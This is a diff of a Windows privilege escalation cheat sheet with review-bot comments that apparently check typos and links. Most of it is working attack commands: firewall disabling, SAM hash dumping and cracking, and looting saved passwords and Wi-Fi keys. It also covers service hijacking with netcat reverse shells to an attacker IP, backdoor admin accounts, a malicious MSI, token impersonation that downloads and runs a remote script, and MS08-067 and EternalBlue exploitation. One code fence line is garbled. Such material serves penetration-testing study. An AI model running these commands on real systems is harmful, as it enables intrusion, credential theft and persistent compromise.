* [Network Enumeration](#network-enumeration)
* [EoP - Looting for passwords](#eop---looting-for-passwords)
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
* [EoP - Kernel Exploitation](#eop---kernel-exploitation)
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
* [EoP - Runas](#eop---runas)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
* [MS08-067 (NetAPI)](#ms08-067-netapi)
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
## Tools
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
```powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
```
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
```powershell
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
```
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
```powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
```
## Windows Version and Configuration ## Windows Version and Configuration
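Review bot: the line crediting [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) is removed and nothing in the hunk re-adds it; since most of the commands below came from there, keep it, e.g. as a References entry. In the Summary, `* [MS11-080 (adf.sys)]` has `adf` for `afd`, and the anchors `#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7` and `#ms11-080-afd.sys---microsoft-windows-xp-2003` keep the `/` and `.` of their headings, which GitHub strips when generating ids (`...nt200020032008xpvista7`, `...afdsys---microsoft-windows-xp2003`), so those two links will not resolve. Under Tools, the PowerUp entry links to PowerShellMafia/PowerSploit while the one-liner downloads `PowerUp.ps1` from PowerShellEmpire/PowerTools; point both at the same repository.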
@@ -8,6 +56,11 @@ Almost all of the following commands are from [The Open Source Windows Privilege
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
``` ```
Extract patchs and updates
```powershell
wmic qfe
```
Architecture Architecture
```powershell ```powershell
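Review bot: `Extract patchs and updates` should read `Extract patches and updates`. Consider `wmic qfe list brief` next to `wmic qfe` so the output is readable, consistent with the `wmic qfe list | findstr "3139914"` check used in the MS16-032 section of this file.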
@@ -18,12 +71,15 @@ List all env variables
```powershell ```powershell
set set
Get-ChildItem Env: | ft Key,Value
``` ```
List all drives List all drives
```powershell ```powershell
wmic logicaldisk get caption || fsutil fsinfo drives wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
``` ```
## User Enumeration ## User Enumeration
@@ -32,6 +88,13 @@ Get current username
```powershell ```powershell
echo %USERNAME% || whoami echo %USERNAME% || whoami
$env:username
```
List user privilege
```powershell
whoami /priv
``` ```
List all users List all users
@@ -39,11 +102,13 @@ List all users
```powershell ```powershell
net user net user
whoami /all whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
``` ```
List logon requirements; useable for bruteforcing List logon requirements; useable for bruteforcing
```powershell ```powershell$env:usernadsc
net accounts net accounts
``` ```
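Review bot: the fence line for the `net accounts` block now reads ```powershell$env:usernadsc; the stray `$env:usernadsc` (a fragment of the `$env:username` line added above) turns the info string into an unknown language and breaks highlighting. Restore it to plain ```powershell.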
@@ -59,32 +124,39 @@ List all local groups
```powershell ```powershell
net localgroup net localgroup
Get-LocalGroup | ft Name
``` ```
Get details about a group (i.e. administrators) Get details about a group (i.e. administrators)
```powershell ```powershell
net localgroup administrators net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
``` ```
## Network Enumeration ## Network Enumeration
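Review bot: `Get-LocalGroupMember Administrateurs` only covers the French locale; rather than adding one line per localized group name, resolve the group by its well-known SID, `Get-LocalGroup -SID S-1-5-32-544 | Get-LocalGroupMember | ft Name,PrincipalSource`, which works whatever the display language.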
List all network interfaces List all network interfaces, IP, and DNS.
```powershell ```powershell
ipconfig /all ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
``` ```
List current routing table List current routing table
```powershell ```powershell
route print route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
``` ```
List the ARP table List the ARP table
```powershell ```powershell
arp -A arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
``` ```
List all current connections List all current connections
@@ -93,10 +165,28 @@ List all current connections
netstat -ano netstat -ano
``` ```
List firware state and current configuration List firewall state and current configuration
```powershell ```powershell
netsh advfirewall firewall dump netsh advfirewall firewall dump
or
netsh firewall show state
netsh firewall show config
```
List firewall's blocked ports
```powershell
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
```
Disable firewall
```powershell
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
``` ```
List all network shares List all network shares
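Review bot: inside the firewall block, the bare word `or` between `netsh advfirewall firewall dump` and `netsh firewall show state` will be pasted as a command; make it a comment (`# or, on older systems:`) or split the block in two. The `$f.rules | where {$_.action -eq "0"}` line selects only blocking rules (action 0 is the block action in `HNetCfg.FwPolicy2`); a short comment saying so would tie it to the "List firewall's blocked ports" heading.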
@@ -105,25 +195,69 @@ List all network shares
net share net share
``` ```
## Looting for passwords SNMP Configuration
### Search for file contents** ```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## EoP - Looting for passwords
### SAM and SYSTEM files
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
```powershell
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
Generate a hash file for John using `pwdump` or `samdump2`.
```powershell
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
```
Then crack it with `john -format=NT /root/sam.txt`.
### Search for file contents
```powershell ```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
``` ```
### Search for a file with a certain filename ### Search for a file with a certain filename
```powershell ```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
``` ```
### Search the registry for key names ### Search the registry for key names and passwords
```powershell ```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
``` ```
### Read a value of a certain sub key ### Read a value of a certain sub key
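Review bot: `reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"` has a stray backslash in `Current\ControlSet`; the path is `HKLM\SYSTEM\CurrentControlSet\Services\SNMP`, as the SNMP Configuration block a few lines earlier spells it. The same block repeats itself: the two Winlogon queries read the same key (the second only filters it), and `reg query HKLM /f password /t REG_SZ /s` duplicates `REG QUERY HKLM /F "password" /t REG_SZ /S /K` minus `/K` (key names versus values), so say which is intended or keep one of each. The SAM paragraph also writes its paths with forward slashes (`%SystemRoot%/system32/config/SAM`, `HKLM/SAM`) while the block below uses backslashes.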
@@ -132,9 +266,9 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
``` ```
### Password in unattend.xml ### Passwords in unattend.xml
Location of the unattend.xml files Location of the unattend.xml files.
```powershell ```powershell
C:\unattend.xml C:\unattend.xml
@@ -144,12 +278,14 @@ C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml C:\Windows\system32\sysprep\sysprep.xml
``` ```
Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
Example content Example content
```powershell ```powershell
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64"> <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon> <AutoLogon>
<Password>*SENSITIVE*DATA*DELETED*</Password> <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled> <Enabled>true</Enabled>
<Username>Administrateur</Username> <Username>Administrateur</Username>
</AutoLogon> </AutoLogon>
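Review bot: "Display the content of these files with `dir /s ...`" is misleading: `dir /s` only lists where the files are, the content is shown with `type`; reword to "Locate these files with ...". The new example `<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>` ends in `==`, but the decode example further down uses the same string with a single `=`; the 36-character form with one padding character is the valid encoding of `SecretSecurePassword1234*` plus newline, so fix the XML to match.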
@@ -165,14 +301,90 @@ Example content
</UserAccounts> </UserAccounts>
``` ```
Unattend credentials are stored in base64 and can be decoded manually with base64.
```powershell
$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
SecretSecurePassword1234*
```
The Metasploit module `post/windows/gather/enum_unattend` looks for these files. The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
## Processes Enum ### IIS Web config
```powershell
Get-Childitem Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
```
### Other files
```bat
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```
### Wifi passwords
Find AP SSID
```bat
netsh wlan show profile
```
Get Cleartext Pass
```bat
netsh wlan show profile <SSID> key=clear
```
Oneliner method to extract wifi passwords from all the access point.
```batch
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```
### Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```
## EoP - Processes Enumeration and Tasks
What processes are running? What processes are running?
```powershell ```powershell
tasklist /v tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
``` ```
Which processes are running as "system" Which processes are running as "system"
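Review bot: `Get-Childitem Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue` is missing the dash on `-Path`; as written PowerShell binds `Path` as the path and `C:\inetpub\` as the filter, so nothing is found. In the SessionGopher block the raw URL on the first line is not a command and should be a comment, and `Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss` carries the tool's README sample credentials; use placeholders like `<domain>\<user>` and `<password>` as the rest of the file does. Grammar: "Oneliner method to extract wifi passwords from all the access point" should read "One-liner to extract the Wi-Fi passwords of all saved profiles".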
@@ -187,36 +399,376 @@ Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
``` ```
## Uploading / Downloading files List installed programs
a wget using powershell
```powershell ```powershell
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
``` ```
wget using bitsadmin (when powershell is not present) List services
```powershell ```powershell
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" net start
wmic service list brief
tasklist /SVC
``` ```
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat Scheduled tasks
```powershell ```powershell
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
``` ```
## Spot the weak service using PowerSploit's PowerUP Startup tasks
```powershell ```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
``` ```
## Thanks to ## EoP - Incorrect permissions in services
> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
Often, services are pointing to writeable locations:
- Orphaned installs, not installed anymore but still exist in startup
- DLL Hijacking
- PATH directories with weak permissions
```powershell
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
```
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
Note to check file permissions you can use `cacls` and `icacls`
> icacls (Windows Vista +)
> cacls (Windows XP)
You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output.
### Example with Windows XP SP1
```powershell
# NOTE: spaces are mandatory for this exploit to work !
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc config upnphost depend= ""
net start upnphost
```
If it fails because of a missing dependency, try the following commands.
```powershell
sc config SSDPSRV start=auto
net start SSDPSRV
net stop upnphost
net start upnphost
sc config upnphost depend=""
```
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
```powershell
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
$ accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
$ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
$ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
$ sc stop <vuln-service>
$ sc start <vuln-service>
$ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
$ sc stop <vuln-service>
$ sc start <vuln-service>
```
## EoP - Windows Subsystem for Linux (WSL)
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
```powershell
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
```
Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
## EoP - Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
### Example
For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
- `C:\Program.exe`
- `C:\Program Files.exe`
## EoP - Kernel Exploitation
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System
- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1)
- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7)
- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7)
...
- [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)
To cross compile a program from Kali, use the following command.
```powershell
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
```
## EoP - AlwaysInstallElevated
Check if these registry values are set to "1".
```bat
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
Then create an MSI package and install it.
```powershell
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
$ msiexec /quiet /qn /i C:\evil.msi
```
Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
## EoP - Insecure GUI apps
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
## EoP - Runas
Use the `cmdkey` to list the stored credentials on the machine.
```powershell
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
```
Then you can use `runas` with the `/savecred` options in order to use the saved credentials.
The following example is calling a remote binary via an SMB share.
```powershell
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
```
Using `runas` with a provided set of credential.
```powershell
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
```
```powershell
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$ computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
## EoP - Common Vulnerabilities and Exposure
### Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
### MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
```c
nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms08-067 <ip_netblock>
```
Metasploit modules to exploit `MS08-067 NetAPI`.
```powershell
exploit/windows/smb/ms08_067_netapi
```
If you can't use Metasploit and only want a reverse shell.
```powershell
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
python ms08-067.py 10.0.0.1 6 445
```
### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
```powershell
https://www.exploit-db.com/exploits/11199
Metasploit : exploit/windows/local/ms10_015_kitrap0d
```
### MS11-080 (afd.sys) - Microsoft Windows XP/2003
```powershell
Python: https://www.exploit-db.com/exploits/18176
Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
```
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : `wmic qfe list | findstr "3139914"`
```powershell
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
### MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script.
```c
nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms17010 <ip_netblock>
```
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
```powershell
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
If you can't use Metasploit and only want a reverse shell.
```powershell
git clone https://github.com/helviojunior/MS17-010
# generate a simple reverse shell to use
